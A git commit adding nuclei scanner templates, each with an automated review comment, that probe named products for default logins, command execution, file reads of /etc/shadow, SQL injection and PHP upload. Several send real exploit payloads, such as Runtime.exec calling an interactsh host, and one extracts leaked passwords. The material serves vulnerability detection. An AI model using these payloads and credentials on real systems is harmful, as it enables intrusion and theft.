Added some Templates

patch-1
SleepingBag945 2023-08-18 05:22:06 +02:00
parent 744ec172b1
commit a8d056b7aa
124 changed files with 4628 additions and 0 deletions

View File

@ -0,0 +1,43 @@
id: d-link-ac-centralized-management-system-default-login
info:
name: D-Link AC Centralized management system Default weak password
author: SleepingBag945
severity: medium
description: |
Access to sensitive information
metadata:
fofa-query: title="AC集中管理平台" && body="D-Link路由器管理页"
tags: Default weak password
http:
- raw:
- |
POST /login.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
user=admin&password=admin
matchers-condition: and
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && !contains(body_1,"flag=0")'
condition: and
- type: word
part: header
words:
- "Set-Cookie"
- "ac_userid"
condition: and
- type: word
part: body
words:
- "window.open"
condition: and
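Review bot: `tags: Default weak password` near the top of this hunk is a phrase with spaces, not a tag list; nuclei expects comma-separated lowercase tokens such as `default-login,d-link`, so this template will not be picked up by the same tag filter as the other default-login templates in this commit. `description` ("Access to sensitive information") should also say what is actually tested, the admin/admin pair in the request body, so a reader does not have to parse the raw request to learn it.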

View File

@ -0,0 +1,34 @@
id: o2oa-default-login
info:
name: O2OA Default Login
author: SleepingBag945
severity: critical
description: O2O存在默认密码xadmin/o2,登录后台可执行系统命令
tags: o2oa,default-login
http:
- raw:
- |
POST /x_organization_assemble_authentication/jaxrs/authentication/captcha HTTP/1.1
Host: {{Hostname}}
Cookie: x-token=anonymous
Authorization: anonymous
Accept: text/html,application/json,*/*
Content-Type: application/json; charset=UTF-8
{"credential":"xadmin","password":"o2"}
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "\"type\": \"success\""
- "distinguishedName"
part: body
condition: and
# 执行命令看这里 http://wiki.peiqi.tech/wiki/oa/O2OA/O2OA%20invoke%20后台远程命令执行漏洞%20CNVD-2020-18740.html
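Review bot: the justification for `severity: critical` lives only in the trailing comment (post-login command execution via the linked wiki page); move that URL into a `reference:` list under `info` and state the consequence in `description`, which is currently Chinese-only while the rest of the metadata is English.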

View File

@ -0,0 +1,29 @@
id: cnzxsoft-information-security-management-system-default-login
info:
name: cnzxsoft information security management system default account
author: SleepingBag945
severity: high
description: |
cnzxsoft Golden Shield Information Security Management System has a default weak password.
tags: default
http:
- raw:
- |
POST /?q=common/login HTTP/1.1
Host: {{Hostname}}
Cookie: check_code=ptbh
Content-Type: application/x-www-form-urlencoded
name=admin&password=zxsoft1234!%40%23%24&checkcode=ptbh&doLoginSubmit=1
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1,"1") && contains(header_1,"ZXSOFT_JDIS_USR_NAME=deleted") && !contains(body_1,"userpwd_error")'
condition: and
#zxsoft1234!@#$
#验证码能绕过,直接登录即可
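Review bot: `contains(body_1,"1")` in the dsl matcher is effectively always true (almost any HTML body contains the character "1") and adds nothing to the check; replace it with a token that only appears in the success response, or drop it and rely on the cookie and the absence of `userpwd_error`. The `Cookie: check_code=ptbh` / `checkcode=ptbh` pairing is the captcha bypass mentioned in the second trailing comment; that explanation belongs in `description`, and the plaintext password in the first comment duplicates the request body.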

View File

@ -0,0 +1,32 @@
id: supershell-default-login
info:
name: supershell 默认密码
author: SleepingBag945
severity: high
description: |
Supershell 是一个通过 WEB 服务访问的 C2 远控平台。SuperShell 存在默认口令漏洞,可通过 tdragon6:tdragon6 登陆获取系统权限。
reference:
- https://github.com/tdragon6/Supershell
tags: supershell
http:
- raw:
- |
POST /supershell/login/auth HTTP/1.1
Host: {{Hostname}}
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.127 Safari/537.36
Content-Type: application/json
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
{"username":"tdragon6","password":"tdragon6"}
matchers:
- type: dsl
dsl:
- status_code_1 == 200 && !contains(body_1,"failed")
- contains(header_1,"token=ey") && contains(body_1,"success")
condition: and
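Review bot: `tags: supershell` omits `default-login`, so this check is excluded from tag-based runs that select the other default-credential templates in this commit; `name` and `description` are Chinese-only even though `reference` is set, so an English summary line would keep `info` consistent. The two dsl expressions are unquoted plain scalars; they parse, but quoting them like the other templates here (`- '...'`) avoids surprises if `#` or `: ` ever appear in them.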

View File

@ -0,0 +1,34 @@
id: tp-link-tl-r470gp-ac-default-login
info:
name: TP-LINK TL-R470GP-AC Default weak password
author: SleepingBag945
severity: high
description: |
TP-LINK TL-R470GP-AC 默认口令123456
metadata:
fofa-query: title="TL-R470GP-AC"
tags: tp-link,default-login,ac
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Connection: close
{"method":"do","login":{"username":"admin","password":"0KcgeXhc9TefbwK"}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "\"stok\""
- "\"error_code\":0"
condition: and
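Review bot: `description` says the default password is 123456, but the request body sends `"password":"0KcgeXhc9TefbwK"`; if that literal is the device's encoded form of 123456, say so in a comment beside the request, because as written the two statements contradict each other and a maintainer cannot tell whether the value was pasted from one specific firmware. `matchers-condition: and` is redundant with a single matcher.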

View File

@ -0,0 +1,29 @@
id: landray-oa-datajson-rce
info:
name: Landray-OA - s_bean sysFormulaSimulateByJS RCE
author: SleepingBag945
severity: critical
description: Landray-OA s_bean sysFormulaSimulateByJS RCE
reference:
- https://github.com/k3sc/Landray-oa-rce-1/blob/main/poc.py
metadata:
fofa-query: app="Landray-OA系统"
tags: landray,rce
http:
- raw:
- |
GET /data/sys-common/datajson.js?s_bean=sysFormulaSimulateByJS&script=%66%75%6e%63%74%69%6f%6e%20%74%65%73%74%28%29%7b%20%72%65%74%75%72%6e%20%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%7d%3b%72%3d%74%65%73%74%28%29%3b%72%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22%70%69%6e%67%20%2d%63%20%34%20{{interactsh-url}}%22%29&type=1 HTTP/1.1
Host: {{Hostname}}
Accept: */*
Connection:close
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "dns"
- "http"
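Review bot: the `script=` parameter is fully percent-encoded, which makes the executed payload unreviewable at a glance; add a comment giving its decoded form so reviewers and defenders can see exactly what runs on a matched host. Minor: `Connection:close` is missing the space after the colon, and `name: http` on the matcher is only a label, so with no `condition` the words list defaults to `or`, which is what you want here since a DNS hit alone suffices.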

View File

@ -0,0 +1,32 @@
id: landray-oa-erp-data-rce
info:
name: Landray-OA - erp_data.jsp RCE
author: SleepingBag945
severity: critical
description: Landray-OA - erp_data.jsp RCE
reference:
- https://cn-sec.com/archives/1249492.html
metadata:
fofa-query: app="Landray-OA系统"
tags: landray,rce
http:
- raw:
- |
POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
var={"body":{"file":"/tic/core/resource/js/erp_data.jsp"}}&erpServcieName=sysFormulaValidate&script=Runtime.getRuntime().exec("ping -c 4 {{interactsh-url}}");
matchers:
- type: word
part: interactsh_protocol
name: http
words:
- "dns"
- "http"
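Review bot: `description` merely repeats `name`; state what `/sys/ui/extend/varkind/custom.jsp` does with `var` and `script` and why `erpServcieName=sysFormulaValidate` reaches an expression evaluator, since `severity: critical` needs that justification. The matcher lists `dns` and `http` for `interactsh_protocol`, but a `ping` only produces a DNS lookup and ICMP, so the `http` word can never match and should be removed (the same applies to the datajson template above).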

File diff suppressed because one or more lines are too long

File diff suppressed because one or more lines are too long

View File

@ -0,0 +1,32 @@
id: acenet-acereporter-report-component-arbitrary-file-download
info:
name: AceNet AceReporter Report component Arbitrary file download
author: SleepingBag945
severity: medium
description: |
The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory to download or read a file beyond the original specified path.
The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system.
metadata:
fofa-query: title="Login @ Reporter" || title="Technology, Inc."
tags: file download
http:
- raw:
- |
GET /view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt HTTP/1.1
Host: {{Hostname}}
- |
GET /view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body_1,"root") && contains(body_1,"daemon")'
- 'status_code_2 == 200 && contains(body_2,"127.0.0.1")'
condition: and
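Review bot: `tags: file download` contains a space and is not a valid tag token; use something like `lfi,traversal`, as the kingdee template in this commit does, so the set is searchable consistently. The two `description` paragraphs are generic text about arbitrary file download in general and say nothing about AceReporter; one sentence naming the `filename` parameter of `download_file.php` as the unvalidated path would be more useful than the boilerplate.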

View File

@ -0,0 +1,39 @@
id: aic-intelligent-campus-system-password-leak
info:
name: AIC Intelligent Campus System Password Leak
author: SleepingBag945
severity: medium
description: |
Due to the design logic defects, the super password is leaked, which can kill more than 40 campus systems.<br>
metadata:
fofa-query: title="AIC智能校园系统"
tags: Disclosure of Sensitive Information
http:
- raw:
- |
GET /datacenter/dataOrigin.ashx?c=login HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200 && contains(body_1,"卡号") && contains(body_1,"密码")'
condition: and
extractors:
- type: regex # type of the extractor
name: username
part: body # part of the response (header,body,all)
group: 1
regex:
- "\"卡号\":\"(.*?)\"" # regex to use for extraction.
- type: regex # type of the extractor
name: passwd
part: body # part of the response (header,body,all)
group: 1
regex:
- "\"密码\":\"(.*?)\"" # regex to use for extraction.
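Review bot: the two extractors copy the leaked card number (`卡号`) and password (`密码`) from the response into the scan output; the dsl matcher already confirms the disclosure, so unless an operator explicitly needs the values, drop the extractors or mark them `internal: true` to keep credentials out of reports and logs. Also remove the trailing `<br>` from `description` (it renders literally), reword "can kill more than 40 campus systems", which reads as a machine translation, and use `status_code_1` in the dsl for consistency with `body_1`.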

View File

@ -0,0 +1,27 @@
id: aruba-instant-default-login
info:
name: Aruba Instant password vulnerability
author: SleepingBag945
severity: medium
description: |
Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.<br>
metadata:
fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js"
tags: default Password
http:
- raw:
- |
POST /swarm.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
opcode=login&user=admin&passwd=admin&refresh=false&nocache=0.17699820340903838
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1,"sid") && contains(body_1,"Admin")'
condition: and
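Review bot: `contains(body_1,"sid")` is a three-letter substring that occurs inside unrelated words ("inside", "consider"), so even combined with "Admin" it is a weak success signal; match the full session field name as it appears in the login response instead. `tags: default Password` has a space (use `default-login,aruba`), and the `<br>` at the end of `description` should go.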

View File

@ -0,0 +1,25 @@
id: avcon6-org-execl-download-arbitrary-file-download
info:
name: AVCON6 org_execl_download.action file down
author: SleepingBag945
severity: medium
description: |
华平软件视频会议 AVCON6 存在任意文件下载
metadata:
fofa-query: title="AVCON6"
tags: fileread
http:
- raw:
- |
GET /org_execl_download.action?filename=../../../../../../../../../../../../../etc/shadow HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code_1 == 200 && contains(body_1,"root:*:0")'
condition: and
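Review bot: `contains(body_1,"root:*:0")` only matches a shadow file whose root entry has `*` (locked) in the password field; a host where root carries a real hash, the case the owner cares most about, will not match. Use a regex matcher that tolerates any password field, in the spirit of the `root:.*:0:0:` regex the sanhui template uses for `/etc/passwd`, adapted to the shadow layout. Also, `severity: medium` for an unauthenticated read of `/etc/shadow` is lower than the `high` given to the `/etc/passwd` read in the same commit, and `tags: fileread` is a third spelling alongside `file download` and `lfi`.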

View File

@ -0,0 +1,27 @@
id: ciphertrust-default-password-vulnerability
info:
name: Ciphertrust default password vulnerability
author: SleepingBag945
severity: medium
description: |
Attackers can control the entire platform through the default password initpass vulnerability, and use administrator privileges to operate core functions.<br>
metadata:
fofa-query: cert="Ciphertrust" || fid="yHV5+ZZGMu0="
tags: default Password
http:
- raw:
- |
POST /api/v1/auth/tokens/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"admin","connection":"local_account","password":"admin","grant_type":"password","refresh_token_revoke_unused_in":30,"cookies":true,"labels":["web-ui"]}
matchers:
- type: dsl
dsl:
- 'status_code_1 == 401 && contains(body_1,"code") && contains(body_1,"Password change required")'
condition: and
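Review bot: `description` names the default password as `initpass`, but the request body sends `"password":"admin"`; one of the two is wrong, or the template tests a different account state than it documents. The matcher fires on a 401 carrying "Password change required", meaning the credential was accepted but a forced rotation is pending; say so in `description` so operators read the hit as "default password still set" rather than "login succeeded". Drop the `<br>` and the space in `tags: default Password`.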

View File

@ -0,0 +1,42 @@
id: cloud-oa-system-sqli
info:
name: Cloud OA system SQLi
author: SleepingBag945
severity: high
description: cloud OA system /OA/PM/svc.asmx page parameters are not properly filtered, resulting in a SQL injection vulnerability, which can be used to obtain sensitive information in the database.
tags: cloudoa,sqli
http:
- raw:
- |
POST /OA/PM/svc.asmx HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
Content-Type: text/xml
Accept-Encoding: gzip, deflate
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetUsersInfo xmlns="http://tempuri.org/">
<userIdList>LOWER(CONVERT(VARCHAR(32),HashBytes('MD5','{{randstr}}'),2))</userIdList>
</GetUsersInfo>
</soap:Body>
</soap:Envelope>
matchers-condition: and
matchers:
- type: word
words:
- "System.Data.SqlClient.SqlException"
- "<?xml version="
- "{{md5('{{randstr}}')}}"
condition: and
- type: status
status:
- 500
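Review bot: the word `"<?xml version="` in the first matcher is present in every SOAP response, success or failure, so it contributes nothing to the `and` condition; remove it. Also confirm that the nested expression `{{md5('{{randstr}}')}}` is evaluated to the digest of the same random string substituted into `userIdList`; if the inner braces are not expanded first, the matcher compares against the md5 of the literal text `{{randstr}}` and never matches.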

View File

@ -0,0 +1,33 @@
id: cmseasy-crossall-act-sqli
info:
name: CmsEasy crossall_act.php SQL injection vulnerability
author: SleepingBag945
severity: high
description: |
CmsEasy 存在SQL注入漏洞通过文件 service.php 加密SQL语句执行即可执行任意SQL命令
metadata:
fofa-query: app="CmsEasy"
tags: sqli
http:
- raw:
- |
GET /?case=crossall&act=execsql&sql=WY8gzSfZwW9R5YvyK HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0
matchers-condition: and
matchers:
- type: word
words:
- '{"123":"123"}'
part: body
- type: status
status:
- 200
# https://www.zilyun.com/44962.html
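Review bot: `name` places the injection in `crossall_act.php` while `description` says `service.php`; the request hits `case=crossall&act=execsql`, so make the two agree. The `sql=WY8gzSfZwW9R5YvyK` value is an encrypted statement per the description; document in a comment what it decodes to and how it was produced, otherwise a maintainer cannot verify the probe is read-only or regenerate it, and move the trailing URL comment into `reference:`.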

View File

@ -0,0 +1,34 @@
id: consul-rexec-rce
info:
name: Consul Rexec RCE
author: SleepingBag945
severity: critical
description: |
Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
metadata:
fofa-query: protocol="consul(http)"
tags: rce
http:
- raw:
- |
GET /v1/agent/self HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- '"EnableRemoteScriptChecks":true'
condition: and
- type: status
status:
- 200
# msf
# search Hashicorp
# exploit/multi/misc/consul_service_exec
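Review bot: this template and the `consul-service-rce` one that follows send the same `GET /v1/agent/self` and test the same flag, so one should be dropped or they should be merged. What is detected is a configuration value (`EnableRemoteScriptChecks` set to true), not command execution; `description` should call this a misconfiguration check, and the msf lines in the trailing comments belong under `reference:`.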

View File

@ -0,0 +1,35 @@
id: consul-service-rce
info:
name: consul-service-rce
author: SleepingBag945
severity: critical
description: |
Under a specific configuration, a malicious attacker can remotely execute commands on the Consul server without authorization by sending a carefully constructed HTTP request.
metadata:
fofa-query: protocol="consul(http)"
tags: rce
http:
- raw:
- |
GET /v1/agent/self HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "\"EnableScriptChecks\": true"
- "\"EnableRemoteScriptChecks\": true"
condition: or
- type: status
status:
- 200
# msf
# search Hashicorp
# exploit/multi/misc/consul_service_exec
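Review bot: the words `"EnableScriptChecks": true` and `"EnableRemoteScriptChecks": true` include a space after the colon, whereas the preceding template matches `"EnableRemoteScriptChecks":true` without one; `/v1/agent/self` returns compact JSON unless `?pretty` is requested, so the spaced form will not match on the same server the other template matches. Pick one spacing (or a regex tolerant of both) and keep a single template.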

View File

@ -0,0 +1,29 @@
id: h2console-unauth
info:
name: H2 Console Web Login Panel - unauth
author: SleepingBag945
severity: medium
description: H2 Console Web login panel was detected.
reference:
- https://blog.csdn.net/weixin_45366453/article/details/125525496
- https://blog.csdn.net/zy15667076526/article/details/111413979
metadata:
shodan-query: http.title:"H2 Console"
tags: unauth,h2,console
http:
- method: GET
path:
- '{{BaseURL}}/h2-console/login.jsp'
matchers:
- type: dsl
dsl:
- "status_code == 200"
- "contains(body, 'Welcome to H2')"
- "contains(body, 'H2 Console')"
condition: and
# Enhanced by md on 2022/11/16
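Review bot: the id `h2console-unauth` and `tags: unauth` claim unauthenticated access, but the matchers only confirm that `/h2-console/login.jsp` renders a login page ("Welcome to H2", "H2 Console"); that is a panel detection. Either rename and tag it as a panel/exposure check at `severity: info`, or add a request that demonstrates access without credentials before calling it unauth.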

View File

@ -0,0 +1,33 @@
id: huiwen-bibliographic-search-system-info-leak
info:
name: 汇文 图书馆书目检索系统 config.properties 信息泄漏漏洞
author: SleepingBag945
severity: high
description: 汇文 图书馆书目检索系统 /include/config.properties 文件中包含敏感信息,攻击者可以直接访问获取信息
tags: huiwen
http:
- raw:
- |
GET /include/config.properties HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
words:
- "host="
- "port="
- "user="
- "password="
part: body
condition: and
- type: status
status:
- 200
# http://wiki.peiqi.tech/wiki/webapp/%E6%B1%87%E6%96%87/%E6%B1%87%E6%96%87%20%E5%9B%BE%E4%B9%A6%E9%A6%86%E4%B9%A6%E7%9B%AE%E6%A3%80%E7%B4%A2%E7%B3%BB%E7%BB%9F%20config.properties%20%E4%BF%A1%E6%81%AF%E6%B3%84%E6%BC%8F%E6%BC%8F%E6%B4%9E.html
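Review bot: the trailing wiki URL should be a `reference:` entry under `info` rather than a comment, and `description` should carry an English line alongside the Chinese so the template reads consistently with the others in this commit.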

View File

@ -0,0 +1,41 @@
id: kemai-ras-ultra-vires-access
info:
name: 科迈 RAS系统 Cookie验证越权漏洞
author: SleepingBag945
severity: high
description: 科迈 RAS系统 存在Cookie验证越权当 RAS_Admin_UserInfo_UserName 设置为 admin 时可访问后台
tags: ras,kemai
http:
- raw:
- |
GET /Server/CmxUser.php?pgid=UserList HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
cookie: RAS_Admin_UserInfo_UserName={{randstr}}
Accept-Encoding: gzip
matchers-condition: and
matchers:
- type: word
words:
- "\"?pgid=User_Show"
- "usingeKey"
- "MachineAmount"
- "AppLoginType"
- "TimeType"
part: body
condition: and
- type: status
status:
- 200
# http://wiki.peiqi.tech/wiki/webapp/%E7%A7%91%E8%BF%88/%E7%A7%91%E8%BF%88%20RAS%E7%B3%BB%E7%BB%9F%20Cookie%E9%AA%8C%E8%AF%81%E8%B6%8A%E6%9D%83%E6%BC%8F%E6%B4%9E.html
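Review bot: `description` says access is granted when `RAS_Admin_UserInfo_UserName` is set to `admin`, but the request sends `{{randstr}}`; if any non-empty value is accepted, say so in a comment, otherwise the request does not test what the description claims. Move the wiki URL from the trailing comment into `reference:`.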

View File

@ -0,0 +1,41 @@
id: kingdee-apusic-directory-traversal
info:
name: Kingdee Apusic - Local File Inclusion
author: SleepingBag945
severity: medium
description: Kingdee Apusic server_file is vulnerable to local file inclusion and can allow attackers to obtain sensitive server information.
reference:
- http://wiki.peiqi.tech/wiki/oa/%E9%87%91%E8%9D%B6OA/%E9%87%91%E8%9D%B6OA%20Apusic%E5%BA%94%E7%94%A8%E6%9C%8D%E5%8A%A1%E5%99%A8-%E4%B8%AD%E9%97%B4%E4%BB%B6%20server_file%20%E7%9B%AE%E5%BD%95%E9%81%8D%E5%8E%86%E6%BC%8F%E6%B4%9E.html
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cwe-id: CWE-22
tags: kingdee,lfi,traversal
http:
- method: GET
path:
- "{{BaseURL}}/admin/protected/selector/server_file/files?folder=C://&suffix="
- "{{BaseURL}}/admin/protected/selector/server_file/files?folder=/&suffix="
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '{"name":"Windows","path":"C:\\\\Windows","folder":true}'
- '{"name":"root","path":"/root","folder":true}'
condition: or
- type: word
words:
- "application/json"
part: header
- type: status
status:
- 200
# Enhanced by mp on 2022/08/03
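Review bot: `cvss-score: 7.5` maps to High on the CVSS v3 scale, yet `severity: medium`; align one with the other. Also check the backslash count in the first word: inside a single-quoted YAML scalar `\\\\` is four literal backslashes, so `C:\\\\Windows` only matches a body that literally contains four, whereas a JSON-encoded `C:\Windows` contains two; verify against a real response before relying on it.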

View File

@ -0,0 +1,46 @@
id: sanhui-smg-file-read
info:
name: 三汇SMG 网关管理软件 down.php 任意文件读取漏洞
author: SleepingBag945
severity: high
description: 三汇SMG 网关管理软件 down.php文件中存在任意文件读取漏洞攻击者通过漏洞可以下载服务器任意文件
tags: sanhui-smg
http:
- raw:
- |
POST /down.php HTTP/1.1
Host: {{Hostname}}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfA9vzLuw6Gmtnmv2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
------WebKitFormBoundaryfA9vzLuw6Gmtnmv2
Content-Disposition: form-data; name="downfile"
/etc/passwd
------WebKitFormBoundaryfA9vzLuw6Gmtnmv2
Content-Disposition: form-data; name="down"
下载
------WebKitFormBoundaryfA9vzLuw6Gmtnmv2
Content-Disposition: form-data; name="runinfoupdate"
------WebKitFormBoundaryfA9vzLuw6Gmtnmv2--
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
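Review bot: as rendered, every multipart part runs its `Content-Disposition` line directly into its value (for example `name="downfile"` followed immediately by `/etc/passwd`) with no empty line between them, and the request header block likewise runs straight into the first boundary; if the blank lines were lost in the file rather than only in this view, the body is malformed and the server will not parse `downfile`. Confirm the file content. `description` is also Chinese-only and there is no `reference:`.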

View File

@ -0,0 +1,28 @@
id: zhixiang-oa-msglog-sqli
info:
name: zhixiang-oa-msglog-sqli
author: SleepingBag945
severity: high
description: 致翔OA msglog.aspx文件存在SQL注入漏洞攻击者通过漏洞可获取敏感信息
reference:
- http://wiki.peiqi.tech/wiki/oa/%E8%87%B4%E7%BF%94OA/%E8%87%B4%E7%BF%94OA%20msglog.aspx%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.html
tags: hongfan,oa,sqli
http:
- raw:
- |
GET /mainpage/msglog.aspx?user=1%27%20and%201=convert(int,(select%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27127381%27))))-- HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Accept: */*
Accept-Encoding: gzip
req-condition: true
matchers:
- type: dsl
dsl:
- 'status_code_1 == 500 && contains(body_1, "43f845fa0c8aef9104f8e1b07625ecf8")'
condition: and
# 可以试着sqlmap osshell
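Review bot: `tags: hongfan,oa,sqli` names a different vendor than the 致翔OA (zhixiang) product in `name` and `description`; this looks copied from another template and will misfile the result under hongfan. Also add a comment stating that `43f845fa0c8aef9104f8e1b07625ecf8` is expected to be the MD5 of the `127381` literal in the query, so the constant can be verified rather than taken on trust.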

View File

@ -0,0 +1,25 @@
id: unauthenticated-qax-vpn-access
info:
name: QAX-VPN - Authentication Bypass
author: unknwon
severity: critical
description: "QAX-VPN has unauthorized management user traversal and any account password modification."
reference:
- https://mp.weixin.qq.com/s/BlXK_EB6ImceX83MIJGKsA
tags: qan-vpn,unauth
metadata:
max-request: 1
http:
- method: GET
path:
- "{{BaseURL}}/admin/group/x_group.php?id=1"
headers:
Cookie: admin_id=1; gw_admin_ticket=1;
matchers:
- type: word
words:
- "javascript:RemoveUserFromList()"
part: body
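Review bot: `tags: qan-vpn,unauth` misspells the product (`qax-vpn`, as in `name`), and `author: unknwon` looks like a typo for `unknown`. The single word matcher has no status check; add a `type: status` matcher for 200 with `matchers-condition: and` so an error page that happens to echo the script name does not count as a hit.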

View File

@ -0,0 +1,40 @@
id: realor-gwt-system-sql-injection
info:
name: 瑞友天翼应用虚拟化系统远程代码漏洞
author: SleepingBag945
severity: critical
description: 瑞友天翼应用虚拟化系统由于对用户传入的数据安全处理不当,导致存在 SQL 注入漏洞,远程且未经过授权认证的攻击者可利用此漏洞获取数据库里敏感信息,也可进一步写入 webshell 后门访问,攻击者从而可在目标服务器上执行任意恶意代码,获取系统权限。
tags: realor,sqli
http:
- raw:
- |
GET /ConsoleExternalUploadApi.XGI?key=FarmName&initParams=command_uploadAuthorizeKeyFile__user_admin%27-%27__pwd_password123__serverIdStr_1&sign=7627a11bf8f214451e7929f05299b9f6 HTTP/1.1
Host: {{Hostname}}
- |
GET /AgentBoard.XGI?user='||'1&cmd=UserLogin HTTP/1.1
Host: {{Hostname}}
- |
GET /Board.XGI HTTP/1.1
Cookie: PHPSESSID={{cookie}}
Host: {{Hostname}}
extractors:
- type: regex
name: cookie
internal: true
part: header
group: 1
regex:
- 'PHPSESSID=(.*?);'
matchers:
- type: dsl
dsl:
- contains(body_1,"未查询到符合条件的用户") || (contains(body_2,"CustomInfo") && contains(header_2,"PHPSESSID"))
- contains(body_3,"src=\"custom/")
condition: and
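Review bot: the first request's `initParams` carries `command_uploadAuthorizeKeyFile`, `user_admin'-'` and `pwd_password123`, which reads as a state-changing action (key upload / credential set) rather than a read-only probe; a detection template should not modify the target, so either explain in a comment why this request is side-effect free or remove it and rely on the second and third requests. The hardcoded `sign=7627a11bf8f214451e7929f05299b9f6` is undocumented, and `name` says remote code while `id` and `tags` say SQL injection; make them agree.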

View File

@ -0,0 +1,30 @@
id: ruijie-nbr-router-fileupload-upload
info:
name: 锐捷 NBR 路由器 fileupload.php 任意文件上传漏洞
author: SleepingBag945
severity: critical
description: 锐捷 NBR 路由器 fileupload.php文件存在任意文件上传漏洞攻击者通过漏洞可以上传任意文件到服务器获取服务器权限
tags: yonyou
http:
- raw:
- |
POST /ddi/server/fileupload.php?uploadDir=upload&name={{randstr_2}}.php HTTP/1.1
Host: {{Hostname}}
Accept: text/plain, */*; q=0.01
Content-Disposition: form-data; name="file"; filename="111.php"
Content-Type: image/jpeg
<?php echo "{{randstr_1}}"; unlink(__FILE__); ?>
- |
GET /ddi/server/upload/{{randstr_2}}.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code_1 == 200
- status_code_2 == 200 && contains(body_2,"{{randstr_1}}")
condition: and
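Review bot: `tags: yonyou` is a different vendor; this is a Ruijie (锐捷) device, so use `ruijie`. The upload request has no `multipart/form-data` Content-Type or boundary, so `Content-Disposition: form-data; name="file"; filename="111.php"` is sent as a request header and the PHP text as a raw body; if the endpoint really reads the raw body and takes the name from the query string, say so in a comment, otherwise the request is malformed. Note too that the uploaded file deletes itself only if it executes; on a host where the upload succeeds but PHP is not executed, a file is left behind in `/ddi/server/upload/`.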

View File

@ -0,0 +1,29 @@
id: sangfor-ad-rce
info:
name: 深信服应用交付管理统远程命令执行
author: SleepingBag945
severity: critical
description: 深信服应用交付管理系统远程命令执行
tags: sangfor,ad,rce
http:
- raw:
- |
POST /rep/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- status_code_1 == 200
- contains(body_1,'uid=')
condition: and
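Review bot: `name` reads 深信服应用交付管理统 while `description` reads 管理系统; restore the missing character in `name`. `req-condition: true` and `matchers-condition: and` are unnecessary for a single-request template with one dsl matcher, and there is no `reference:` for a critical-severity check.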

View File

@ -0,0 +1,56 @@
id: secworld-secgate-3600-firewall-upload
info:
name: secworld-secgate-3600-firewall-upload
author: SleepingBag945
severity: critical
description: 网神防火墙obj_app_upfile任意文件上传
reference:
